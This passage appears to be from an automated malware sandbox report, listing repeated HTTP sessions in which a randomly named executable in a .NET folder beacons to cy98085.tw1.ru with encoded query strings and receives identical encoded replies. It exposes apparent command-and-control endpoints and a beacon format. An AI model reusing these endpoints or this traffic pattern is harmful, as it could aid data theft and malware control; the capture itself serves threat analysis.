                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:51.460709095 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.649862185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:56.596008062 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:58.063668966 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.649878185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:03.354399920 CET2183OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDNiVGNkBjYmJDO1MTZ3M2NwEGO0EmN1ICLiITN1gjZwcTYmdTM4UzN2MjZwQWZxIDNlFjNyIDOhNmYmRTYlBDO4EjI6IyN3ETYjZmZwI2YiVGMjFWMjZGOxUjZwMTOlhTM3YGOjJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:04.826591015 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.649895185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:09.956015110 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:11.367178917 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.649911185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:16.502609015 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:17.912933111 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.649926185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:23.049510002 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:24.407355070 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.649942185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:29.586147070 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:31.114972115 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.649955185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:36.239336967 CET2233OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:21:37.641001940 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.649971185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:21:42.769056082 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:44.238723993 CET267INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.649987185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
